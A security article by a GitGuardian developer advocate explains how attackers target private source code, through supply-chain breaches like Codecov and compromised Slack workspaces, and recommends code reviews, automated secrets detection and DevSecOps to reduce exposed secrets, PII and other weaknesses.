Micro Focus is now part of OpenText. Learn more >

You are here

You are here

How to protect your source code from attackers

Mackenzie Jackson Developer Advocate, GitGuardian

When people talk about writing secure code, they're generally referring to creating secure applications. This means writing code that doesn't create vulnerabilities when your application is running. 

But what about securing the source code itself, separate from the application? People often wrongly assume that, because source code is private, it is protected. But malicious actors know that gaining access to source code can not only guide them to vulnerabilities within the application—it can also expose other types of active threats.

All source code is unique. It can be the most valuable resource a company holds, but it is also, by nature, a very leaky asset. It is pushed into your version-control system, then cloned onto your developers' machines (personal and professional), forked into new projects, included in internal wikis, backed up on cloud drives, shared through messaging systems such as Slack, and even posted into public developer forums such as Stack Overflow.

Code is never truly deleted from many version-control systems. When a new version is uploaded, the previous version is often hidden under a pile of old commits. Regardless of how or where your code sprawls, you have no visibility over where it might end up, no way to audit who has accessed or cloned the code, no way to know for sure that it is still secure. It is nearly impossible to prevent source code from leaking through your organization.

Don't get the wrong idea. I am not saying that you need to have strict access control on source code and wrap it in multiple authentication layers. I'm saying that your source code and anything within it should be assumed to be vulnerable.

You may argue that everywhere code can sprawl is private, with layers of authentication, so even sprawled source code does not pose a security risk. This unfortunately is not true. Code repositories have become known as a valuable target for attackers because they contain lots of sensitive information, and attackers rely on this.

Recently we have seen a massive increase in attackers targeting private repositories. Here are some of the techniques attackers use—and what you can do to stop them.

Targeting repositories through supply chain attacks

A software supply chain attack happens when hackers manipulate the code in third-party software components in order to compromise the downstream applications that use them. There's been a dramatic rise in such attacks, which completely changes their economics.

A recent example of this is the April 2021 Codecov breach, which potentially exposed any credentials, tokens, or keys that Codecov's customers were passing through its CI runner and would be accessible when the Bash Uploader script was executed, as well as any services, data stores, and application code that could be accessed with those credentials, tokens, or keys.

Attackers were able to compromise Codecov by using credentials found in a misconfigured Docker image. Using this credential, attackers accessed the private code repository of Codecov and inserted a malicious line of code. This line of code took credentials that were being used in the CI environment and sent them to the attacker directly. The breach remained undetected for months.

While the attackers gained access to a variety of potentially sensitive credentials, by analyzing the attack path, we can see what they were really after: credentials to private code repositories within Codecov and its 22,000 customers. We know this from the public responses from such Codecov customers as Rapid7, Twillio, Confluent, and Atlassian.

None of these companies reported any major data breach as a result of the incident, but they nevertheless took actions to shore up their security postures and alerted their customers.

Targeting internal messaging systems

A favorite playbook of attackers is to gain access to companies' internal messaging systems, such as Slack. This can be done in many different ways, including by using sophisticated phishing techniques or simply by buying an organization's session ID cookie on the black market.

Once in Slack, attackers can scan channels for sensitive information and source code or convince administrators to give them access to private systems. This is exactly what hackers did to access Electronic Arts' private codebase.

There are many more examples of source code being exposed via various attack techniques. The point is that source code, and the repositories in which they're stored, are not secure vaults and often create a weakness in a company's security posture.

Threats within source code

You may be familiar with the potential security threats within your applications—for instance, cross-site scripting or SQL injection—but what about the source code itself? Your source code can contain both active and passive threats.

Active threats are items that can be immediately used in an exploit. This includes secrets within the codebase such as API keys and credentials. Passive threats are those that can be used by an attacker to target weak areas of your application.

Active threats: Secrets and PII

Here are two examples of active threats.

Revealing secrets

Secrets are the most obvious example of an active threat. Secrets, or digital authentication credentials, include API keys, security certificates, database credentials, and anything else that provides access to systems and services.

We use secrets to authenticate ourselves and our systems with our applications, and we can have hundreds of secrets to manage. Think of all the services your applications might have, from SaaS tools to cloud infrastructure, alerting tools, and the dashboard.

All of these systems use secrets. These secrets are made to be used programmatically, and therefore commonly end up within source code. Also, the history may live forever in your version-control system, unless you rewrite it. Because of this, secrets may be buried in your history, hidden from you but easily uncovered by attackers who know what they are looking for.

Secrets are commonly found within repositories, sometimes through poor practices such as hardcoding secrets, sometimes through auto-generated files such as debug logs. They can be included in configuration files that are accidentally committed into the system. 

Exposing personally identifiable information

It is very common for PII to coexist with source code. This may be from a database dump or debug logs that have been captured and added into the repository. Once this data enters the same location as the source code, it is cloned and copied with it.

Not only can this be a threat to your users, but it can also have a huge impact on compliance. This is exactly the type of information discovered when the Indian government was breached earlier this year in a white-hat attack. This included MySQL dumps and even sensitive police reports that had entered the repositories' history.

Passive threats: Cryptography and app logic

Passive threats can be found in areas such as cryptography and business application logic.

Cryptography weaknesses

There can be many flaws in your cryptography, including exposing the encryption key, which would be considered a secret. But simply showing the method of encryption can also be a security threat. Cryptography tends to start out strong and gradually get weaker. Therefore, if you continually maintain support for old crypto, you're becoming less secure and trustworthy.

This means encryption methods must continually be improved over time. That being said, using brute force to try to decrypt encrypted data is typically not the first step by attackers. This is because it is difficult, if not impossible, to determine what encryption method has been used and whether it is even possible to decrypt it.

If, however, you are using weak encryption or encryption with known vulnerabilities, and this is written in your source code, then this can point an attacker directly to insecure data within your application. An example of this would be continuing to use the MD5 hashing algorithm despite a 2008 guidebook by CompTIA saying this method is extremely insecure. 

Problems with business application logic

Business logic vulnerabilities are flaws in the design and implementation of an application that allows an attacker to elicit unintended behavior. Unlike some of the other vulnerabilities listed, these types of flaws can be exploited from the running application and an attacker does not need the source code to discover them.

Some examples of common business logic vulnerabilities are:

  • Putting excessive trust in client-side controls
  • Failing to handle unconventional input
  • Making flawed assumptions about user behavior

But in some cases, using the source code can dramatically help an attacker target specific areas of an application. Once attackers have access to your source code, they can map endpoints easily and uncover the assumptions the developers have made in how users will use your application.

Check your dependencies

In the vast majority of applications today, 90% of the code comes from open-source libraries, SaaS tools, and other external components. This means that hackers often know your code better than you do, because they study these components and know how to exploit them.

The first step an attacker might take in launching an attack against your application is to try to figure out what vulnerable dependencies your application relies on. Tools such as Snyk have massive databases of known vulnerabilities in these components, and a simple scan can tell you what critical vulnerabilities your application is running on. It may even be possible to download a working exploit for the vulnerability from the Internet.

Of course, you can argue that a user can discover dependencies through a running application, but this is only true for what the user has access to. To get the most comprehensive list of vulnerabilities, you must have access to the application's source code. If attackers gain access to source code, they can produce a list of targets and exploits they can potentially run against your application.

Preventing insecure source code

There is no security silver bullet that solves all problems, and insecure source code is much the same. Once we can all agree that source code is a leaky asset and that anything inside it will eventually be exposed, we can start to take appropriate actions to prevent vulnerabilities from entering source code.

Code reviews

Protecting source code comes down to education, code reviews, tools and knowing where to spend your energy. A 2015 AppSec USA survey showed which vulnerabilities were most commonly missed by automated tools and which were most frequently picked up. In this case, "Insecure Direct Object Reference," "Sensitive Data Exposure," and "Missing Access Control" were most commonly missed by automated tools.

This gives a great indication of which vulnerabilities you need to spend your time looking for in manual processes such as code reviews and which can be reliably collected from automated tools. A great way to get started is with the OWASP Code Review Guide (PDF), a free resource from the Open Web Application Security Project.

Automated secrets detection

Secrets are among the most sensitive vulnerabilities that can be exposed in your code, the crown jewels of your organization that can provide access to the most valuable information and systems.

Attackers using credentials can be particularly harmful because, once properly authenticated, they can remain undetected for extended periods of time, moving laterally through systems, elevating privileges, and collecting information. It is vital to implement automated secrets detection using a dedicated tool.


Too often, security is left to a limited department of security experts, but there is a lot that developers can and should share responsibility for. DevSecOps is the concept of bringing developers into the security process early. Arguably, no one is more connected to the source code than developers, so it makes sense that they share some of the responsibility in making sure it is secure.

This means not only that fewer vulnerabilities are introduced into the source code, but also that many others are picked up sooner, reducing the cost of remediation. While this does not mean you can remove the security team altogether, it does mean that you can increase security coverage throughout the entire software development lifecycle.

Know what can be prevented and where to focus

Source code is a valuable but very leaky asset. However, wrapping it in heavy layers of authentication will only slow down the development process.

While you may not have control over source code leaking, you do have control over the vulnerabilities that your source code can expose. These can include active threats such as leaked secrets and PII, or passive threats such as cryptography weakness, business/application logic flaws, and vulnerable dependencies.

The key to being able to protect these is to understand what can be prevented using tools and what you need to focus on in code reviews. Ultimately, protecting source code will undoubtedly require a shared responsibility model among the security team, operations teams, and the developers themselves. 

In the end, all organizations should strive to have source code that can be open-sourced at any moment without introducing any additional security bugs.

Keep learning

Read more articles about: SecurityApplication Security